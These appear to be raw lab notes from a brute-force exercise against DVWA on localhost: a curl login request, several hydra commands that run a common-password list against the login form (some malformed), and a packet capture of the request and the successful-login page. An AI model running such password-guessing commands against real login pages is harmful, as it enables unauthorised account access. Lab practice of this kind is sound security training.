curl 'http://localhost:8080/vulnerabilities/brute/?username=pablo&password=letmein&Login=Login#' \
--compressed \
-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' \
-H 'Accept-Encoding: gzip, deflate, br, zstd' \
-H 'Connection: keep-alive' \
-H 'Referer: http://localhost:8080/vulnerabilities/brute/' \
-H 'Cookie: pma_lang=en; PHPSESSID=0ccefgem17l0gtdp7lhie9oqq1; security=low' \
-H 'Upgrade-Insecure-Requests: 1' \
-H 'Sec-Fetch-Dest: document' \
-H 'Sec-Fetch-Mode: navigate' \
-H 'Sec-Fetch-Site: same-origin' \
-H 'Sec-Fetch-User: ?1' \
-H 'Priority: u=0, i' | \
grep --color=always -E '(Welcome to the password protected area pablo|Username and\/or password incorrect)' | \
sed -e 's/Welcome to the password protected area pablo/\x1b[32m&\x1b[0m/' \
    -e 's/Username and\/or password incorrect\./\x1b[31m&\x1b[0m/'







hydra -L users.txt -P 10k-most-common.txt 127.0.0.1 http-post-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie" -vV -f




hydra -L users.txt -P 10k-most-common.txt 127.0.0.1 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie: PHPSESSID=0ccefgem17l0gtdp7lhie9oqq1; security=low:F=Username and/or password incorrect"



hydra -L users.txt -P 10k-most-common.txt http-get-form "localh/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie=PHPSESSID=0ccefgem17l0gtdp7lhie9oqq1; security=low:F=Username and/or password incorrect:S=Welcome to the password protected area"


hydra -L users.txt -P 10k-most-common.txt "http-get-form://localhost:8080/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: PHSESSID=0ccefgem17l0gtdp7lhie9oqq1; security=low;F=Username and/or password incorrect



Frame 10: 761 bytes on wire (6088 bits), 761 bytes captured (6088 bits) on interface any, id 0
Linux cooked capture v1
    Packet type: Unicast to us (0)
    Link-layer address type: Loopback (772)
    Link-layer address length: 6
    Source: 00:00:00_00:00:00 (00:00:00:00:00:00)
    Unused: 0000
    Protocol: IPv4 (0x0800)
Internet Protocol Version 4, Src: 127.0.0.1, Dst: 127.0.0.1
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
    Total Length: 745
    Identification: 0x24ac (9388)
    Flags: 0x40, Don't fragment
    ...0 0000 0000 0000 = Fragment Offset: 0
    Time to Live: 64
    Protocol: TCP (6)
    Header Checksum: 0x1561 [validation disabled]
    [Header checksum status: Unverified]
    Source Address: 127.0.0.1
    Destination Address: 127.0.0.1
Transmission Control Protocol, Src Port: 41528, Dst Port: 8080, Seq: 1, Ack: 1, Len: 693
    Source Port: 41528
    Destination Port: 8080
    [Stream index: 0]
    [Conversation completeness: Complete, WITH_DATA (31)]
    [TCP Segment Len: 693]
    Sequence Number: 1    (relative sequence number)
    Sequence Number (raw): 1995561605
    [Next Sequence Number: 694    (relative sequence number)]
    Acknowledgment Number: 1    (relative ack number)
    Acknowledgment number (raw): 2816575458
    1000 .... = Header Length: 32 bytes (8)
    Flags: 0x018 (PSH, ACK)
    Window: 512
    [Calculated window size: 65536]
    [Window size scaling factor: 128]
    Checksum: 0x00de [unverified]
    [Checksum Status: Unverified]
    Urgent Pointer: 0
    Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps
        TCP Option - No-Operation (NOP)
        TCP Option - No-Operation (NOP)
        TCP Option - Timestamps: TSval 2397911362, TSecr 2397911361
    [Timestamps]
    [SEQ/ACK analysis]
    TCP payload (693 bytes)
Hypertext Transfer Protocol
    GET /vulnerabilities/brute/?username=pablo&password=letmein&Login=Login HTTP/1.1\r\n
    Host: localhost:8080\r\n
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0\r\n
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8\r\n
    Accept-Language: en-US,en;q=0.5\r\n
    Accept-Encoding: gzip, deflate, br, zstd\r\n
    Connection: keep-alive\r\n
    Referer: http://localhost:8080/vulnerabilities/brute/\r\n
    Cookie: pma_lang=en; PHPSESSID=0ccefgem17l0gtdp7lhie9oqq1; security=low\r\n
    Upgrade-Insecure-Requests: 1\r\n
    Sec-Fetch-Dest: document\r\n
    Sec-Fetch-Mode: navigate\r\n
    Sec-Fetch-Site: same-origin\r\n
    Sec-Fetch-User: ?1\r\n
    Priority: u=0, i\r\n
    \r\n
    [Full request URI: http://localhost:8080/vulnerabilities/brute/?username=pablo&password=letmein&Login=Login]
    [HTTP request 1/1]
    [Response in frame: 20]






Frame 16: 1894 bytes on wire (15152 bits), 1894 bytes captured (15152 bits) on interface any, id 0
Linux cooked capture v1
    Packet type: Unicast to another host (3)
    Link-layer address type: Ethernet (1)
    Link-layer address length: 6
    Source: 02:42:ac:11:00:02 (02:42:ac:11:00:02)
    Unused: 0000
    Protocol: IPv4 (0x0800)
Internet Protocol Version 4, Src: 172.17.0.2, Dst: 172.17.0.1
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
    Total Length: 1878
    Identification: 0xcd1e (52510)
    Flags: 0x40, Don't fragment
    ...0 0000 0000 0000 = Fragment Offset: 0
    Time to Live: 64
    Protocol: TCP (6)
    Header Checksum: 0x0e5e [validation disabled]
    [Header checksum status: Unverified]
    Source Address: 172.17.0.2
    Destination Address: 172.17.0.1
Transmission Control Protocol, Src Port: 80, Dst Port: 60138, Seq: 1, Ack: 694, Len: 1826
Hypertext Transfer Protocol
    HTTP/1.1 200 OK\r\n
        [Expert Info (Chat/Sequence): HTTP/1.1 200 OK\r\n]
        Response Version: HTTP/1.1
        Status Code: 200
        [Status Code Description: OK]
        Response Phrase: OK
    Date: Wed, 18 Sep 2024 00:20:18 GMT\r\n
    Server: Apache/2.4.25 (Debian)\r\n
    Expires: Tue, 23 Jun 2009 12:00:00 GMT\r\n
    Cache-Control: no-cache, must-revalidate\r\n
    Pragma: no-cache\r\n
    Vary: Accept-Encoding\r\n
    Content-Encoding: gzip\r\n
    Content-Length: 1474\r\n
    Keep-Alive: timeout=5, max=100\r\n
    Connection: Keep-Alive\r\n
    Content-Type: text/html;charset=utf-8\r\n
    \r\n
    [HTTP response 1/1]
    [Time since request: 0.003724526 seconds]
    [Request in frame: 12]
    [Request URI: http://localhost:8080/vulnerabilities/brute/?username=pablo&password=letmein&Login=Login]
    Content-encoded entity body (gzip): 1474 bytes -> 4413 bytes
    File Data: 4413 bytes
Line-based text data: text/html (109 lines)
    \r\n
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n
    \r\n
    <html xmlns="http://www.w3.org/1999/xhtml">\r\n
    \r\n
    \t<head>\r\n
    \t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n
    \r\n
    \t\t<title>Vulnerability: Brute Force :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n
    \r\n
    \t\t<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />\r\n
    \r\n
    \t\t<link rel="icon" type="\image/ico" href="../../favicon.ico" />\r\n
    \r\n
    \t\t<script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script>\r\n
    \r\n
    \t</head>\r\n
    \r\n
    \t<body class="home">\r\n
    \t\t<div id="container">\r\n
    \r\n
    \t\t\t<div id="header">\r\n
    \r\n
    \t\t\t\t<img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web Application" />\r\n
    \r\n
    \t\t\t</div>\r\n
    \r\n
    \t\t\t<div id="main_menu">\r\n
    \r\n
    \t\t\t\t<div id="main_menu_padded">\r\n
    \t\t\t\t<ul class="menuBlocks"><li class=""><a href="../../.">Home</a></li>\n
    <li class=""><a href="../../instructions.php">Instructions</a></li>\n
    <li class=""><a href="../../setup.php">Setup / Reset DB</a></li>\n
    </ul><ul class="menuBlocks"><li class="selected"><a href="../../vulnerabilities/brute/">Brute Force</a></li>\n
    <li class=""><a href="../../vulnerabilities/exec/">Command Injection</a></li>\n
    <li class=""><a href="../../vulnerabilities/csrf/">CSRF</a></li>\n
    <li class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li>\n
    <li class=""><a href="../../vulnerabilities/upload/">File Upload</a></li>\n
    <li class=""><a href="../../vulnerabilities/captcha/">Insecure CAPTCHA</a></li>\n
    <li class=""><a href="../../vulnerabilities/sqli/">SQL Injection</a></li>\n
    <li class=""><a href="../../vulnerabilities/sqli_blind/">SQL Injection (Blind)</a></li>\n
    <li class=""><a href="../../vulnerabilities/weak_id/">Weak Session IDs</a></li>\n
    <li class=""><a href="../../vulnerabilities/xss_d/">XSS (DOM)</a></li>\n
    <li class=""><a href="../../vulnerabilities/xss_r/">XSS (Reflected)</a></li>\n
    <li class=""><a href="../../vulnerabilities/xss_s/">XSS (Stored)</a></li>\n
    <li class=""><a href="../../vulnerabilities/csp/">CSP Bypass</a></li>\n
    <li class=""><a href="../../vulnerabilities/javascript/">JavaScript</a></li>\n
    </ul><ul class="menuBlocks"><li class=""><a href="../../security.php">DVWA Security</a></li>\n
    <li class=""><a href="../../phpinfo.php">PHP Info</a></li>\n
    <li class=""><a href="../../about.php">About</a></li>\n
    </ul><ul class="menuBlocks"><li class=""><a href="../../logout.php">Logout</a></li>\n
    </ul>\r\n
    \t\t\t\t</div>\r\n
    \r\n
    \t\t\t</div>\r\n
    \r\n
    \t\t\t<div id="main_body">\r\n
    \r\n
    \t\t\t\t\r\n
    <div class="body_padded">\r\n
    \t<h1>Vulnerability: Brute Force</h1>\r\n
    \r\n
    \t<div class="vulnerable_code_area">\r\n
    \t\t<h2>Login</h2>\r\n
    \r\n
    \t\t<form action="#" method="GET">\r\n
    \t\t\tUsername:<br />\r\n
    \t\t\t<input type="text" name="username"><br />\r\n
    \t\t\tPassword:<br />\r\n
    \t\t\t<input type="password" AUTOCOMPLETE="off" name="password"><br />\r\n
    \t\t\t<br />\r\n
    \t\t\t<input type="submit" value="Login" name="Login">\n
    \r\n
    \t\t</form>\r\n
    \t\t<p>Welcome to the password protected area pablo</p><img src="/hackable/users/pablo.jpg" />\r\n
    \t</div>\r\n
    \r\n
    \t<h2>More Information</h2>\r\n
    \t<ul>\r\n
    \t\t<li><a href="https://www.owasp.org/index.php/Testing_for_Brute_Force_(OWASP-AT-004)" target="_blank">https://www.owasp.org/index.php/Testing_for_Brute_Force_(OWASP-AT-004)</a></li>\r\n
    \t\t<li><a href="http://www.symantec.com/connect/articles/password-crackers-ensuring-security-your-password" target="_blank">http://www.symantec.com/connect/articles/password-crackers-ensuring-security-your-password</a></li>\r\n
    \t\t<li><a href="http://www.sillychicken.co.nz/Security/how-to-brute-force-http-forms-in-windows.html" target="_blank">http://www.sillychicken.co.nz/Security/how-to-brute-force-http-forms-in-windows.html</a></li>\r\n
    \t</ul>\r\n
    </div>\n
    \r\n
    \t\t\t\t<br /><br />\r\n
    \t\t\t\t\r\n
    \r\n
    \t\t\t</div>\r\n
    \r\n
    \t\t\t<div class="clear">\r\n
    \t\t\t</div>\r\n
    \r\n
    \t\t\t<div id="system_info">\r\n
     [truncated]\t\t\t\t<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=brute&security=low' )"> <input type="button" value="View Source" class="popup_button" i
    \t\t\t</div>\r\n
    \r\n
    \t\t\t<div id="footer">\r\n
    \r\n
    \t\t\t\t<p>Damn Vulnerable Web Application (DVWA) v1.10 *Development*</p>\r\n
    \t\t\t\t<script src='/dvwa/js/add_event_listeners.js'></script>\r\n
    \r\n
    \t\t\t</div>\r\n
    \r\n
    \t\t</div>\r\n
    \r\n
    \t</body>\r\n
    \r\n
    </html>







